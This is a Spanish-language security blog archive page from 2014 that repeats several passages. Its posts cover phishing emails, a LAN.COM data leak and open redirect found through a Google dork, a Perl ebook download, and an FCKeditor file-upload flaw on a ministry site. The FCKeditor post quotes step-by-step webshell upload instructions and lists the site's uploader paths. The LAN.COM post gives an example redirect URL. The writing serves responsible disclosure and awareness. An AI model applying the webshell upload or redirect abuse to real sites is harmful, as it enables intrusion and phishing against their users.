Revisaba mi correo cuando me llamó la atención en mi bandeja de entrada lo siguiente:
Al entrar al correo nos encontramos con el siguiente contenido, y ya podemos comenzar a sospechar:
sábado, 27 de diciembre de 2014
Campaña de Phishing - Banco Estado
Revisaba mi correo cuando me llamó la atención en mi bandeja de entrada lo siguiente:
Al entrar al correo nos encontramos con el siguiente contenido, y ya podemos comenzar a sospechar:
sábado, 22 de noviembre de 2014
LAN.COM | DataLeak & OpenUrlRedirection
Revisando en mi bandeja de correo, LAN.COM genera correo con ofertas-Estados de Cuenta y otras promociones al correo que tenemos registrado con nuestra cuenta. El contenido de estos correos están en un subdominio de lan.com llamado: news.lan.com
Alcance:
Con esta información, podriamos generar perfectamente un ataque de phishing personalizado. Además de tomar en cuenta que ya un DataLeak por si solo es un problema a la privacidad.
Al observar mi propio correo enviado por LAN puedo identificar lo siguiente:
1) Cuando me ofrece acceder a distintos lugares donde debo ser redirigido la URL va de la siguiente forma [imagen 1] y el sitio donde quiero ser enviado pasa como parámetro después de '&'.
2) Como se trata de un correo de publicidad o de estados de cuenta por parte de LAN, nos ofrece realizar un "unsuscribe"(cancelar la suscripción) para dejar de recibir los correos por parte de ellos donde la URL muestra nuestro correo y nos lleva a la confirmación para la cancelación.
Dejando en claro esto es que comienzan los experimentos:
1) ¿Podremos cancelar la suscripción de otras personas arbitrariamente?
Lamentablemente, para cancelar la suscripción en la URL cada correo tiene su propio parámetro "CHECK" , unas cuantas combinaciones de letras y números generados para cada correo con el cual evitan que podamos utilizarlo para cancelar la suscripción de otros, ya que tendríamos que conocer su CHECK individual.
2) ¿El Open Url Redirection es tan "Open" como pensamos? - Una buena respuesta es NO y SI: NO: porque despues de http://news.lan.com/?XXXXXXXXXXXX viene un codigo generado por LAN que le da validez a la redirección pero sin limitar el destino de esta redirección: en otras palabras podemos ocupar ese codigo valido para redirgir donde nosotros queramos, las veces que queramos.
¿y que hacemos? - Si para cancelar la suscripción existe un check propio y relacionado con un correo único y por otro lado necesitamos el otro código valido para generar la redirección.
Pues GOOGLE no?
Dork? pueden imaginarlo: site:http://news.lan.com
Dork? pueden imaginarlo: site:http://news.lan.com
182 resultados.
Cada resultado o al menos la mayoría contiene los mismos datos que los correos que recibí: Antes se seguir Aquí viene la parte del DATALEAK:
Correos son enviados con: Nombre Apellido Nºde Socio Kms LanPass Fecha de Vencimiento y gracias a que tenemos en todos la opción de "cancelar suscripción" Podemos obtener el Correo Electronico.
Ejemplo :
Gracias a GOOGLE obtenemos:
* Correo + check valido, pudiendo cancelar la suscripción de aquellos correos indexados por el buscados que son alrededor de 182 resultados .
*Además obtenemos códigos validos para realizar el Open Url Redirection por ejemplo:
Donde al reemplazar el sitio que viene después de '&' podemos realizar finalmente la redirección arbitraria como muestra este ejemplo hacia Google:
http://news.lan.com/?YEmp.2v3Z**********&http://google.cl
Alcance:
Con esta información, podriamos generar perfectamente un ataque de phishing personalizado. Además de tomar en cuenta que ya un DataLeak por si solo es un problema a la privacidad.
Estado:
Me comunique con el encargado de seguridad de LAN y me comunicaron que estaban al tanto de lo que sucedía y habían levantado el tema hacia el área encargada hace bastante tiempo.
TimeLapse?
7 Noviembre: Comunique el Problema
17 Noviembre: Solución a los Resultados de la Búsqueda en Google.
22 Noviembre: Publicación.
Me comunique con el encargado de seguridad de LAN y me comunicaron que estaban al tanto de lo que sucedía y habían levantado el tema hacia el área encargada hace bastante tiempo.
TimeLapse?
7 Noviembre: Comunique el Problema
17 Noviembre: Solución a los Resultados de la Búsqueda en Google.
22 Noviembre: Publicación.
Excelente y rápida respuesta del Encargado de Seguridad de LAN, muy amable, atento a los reportes, y a responder cada correo.
*/ FIN
miércoles, 12 de noviembre de 2014
Mineduc & Fckeditor: Arbitrary File Upload Vulnerability
La vulnerabilidad en Fckeditor [ Arbitrary File Upload Vulnerability] es bastante conocida y la forma de explotarla y lograr subir una Webshell también, es cosa de hacer una búsqueda en Google.Y vemos que aparecen multiples "exploits" como el que se muestra aquí:
1.create a htaccess file: code:SetHandler application/x-httpd-php 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html ---------------------------------------------------------------------------------------------- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically. 5.http://target.com/anything/shell_php.gif 6.Now shell is available from server.
El sitio del Mineduc utiliza Fckeditor. / UPS
Es relativamente fácil encontrar los directorios finales ya que son públicamente conocidos, así llegar a los uploaders.
Mineduc?
http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/upload/test.html
http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/frmupload.html
http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html
---------------------------------------------------------------
Reportado // -> ESTADO: Fixed
FIN /..
viernes, 31 de octubre de 2014
[Compartir] Libros de Perl - #!usr/bin/perl
En esta ocasión vengo a compartir algunos texto sobre Perl, para que puedan leer sobre este lenguaje y los guarden en sus bibliotecas propias.
-> O'Reilly - Advanced Perl Programming
-> O'Reilly Learning Perl
-> O'Reilly Mastering Algorithms with Perl
-> O'Reilly - Perl - Perl For Sysadmins
-> O'Reilly - Perl and XML
-> O'Reilly Perl Cookbook
-> O'Reilly Programming Perl - 4Th-Edition - Feb-2012
Freakshare / Descarga
Pass: perlonbook
-> O'Reilly - Advanced Perl Programming
-> O'Reilly Learning Perl
-> O'Reilly Mastering Algorithms with Perl
-> O'Reilly - Perl - Perl For Sysadmins
-> O'Reilly - Perl and XML
-> O'Reilly Perl Cookbook
-> O'Reilly Programming Perl - 4Th-Edition - Feb-2012
Freakshare / Descarga
Pass: perlonbook
martes, 22 de julio de 2014
Ataque dirigido simulando GoogleDocs - CHILE
Una tarde como esta estaba tranquilo por la vida y derrepente mi novia me dice: ¿Hey, me llego esto y no sé si abrirlo? [Han servido mis conversaciones de que no abra cualquier cosa y desconfie de todo eh? JAJAJAJA ]
Resulta que le llego desde un remitente conocido un singular correo que en el asunto dice lo siguiente:
"documento Confidencial"
En el cuerpo del mensaje:
Estableciendo el contexto, puede suceder y que alguien crea este correo por lo siguiente: ( y así sucedio o.O )
1) EL remitente es de un profesor, por lo cual existen razones creíbles por que debería consultar el documento.
2) El usuario común muchas veces no se percata de la URL:
OJO: Consultar el documento subido a googledocs simplemente INICIANDO SESIÓN CON TU EMAIL, expresando que es muy importante.
Dirigidos a :
http://www.mainecoastcottage.com/FileAuth/googledocs/index.html
Podemos iniciar sesión con yahoo! ; Gmail ; OUTLOOK 77 ; AOL etc.
Aquí lo que se despliega en cada situación:
PD: Fue detectado como sitio de phishing mientras escribia el post
Saludos.
Suscribirse a:
Entradas (Atom)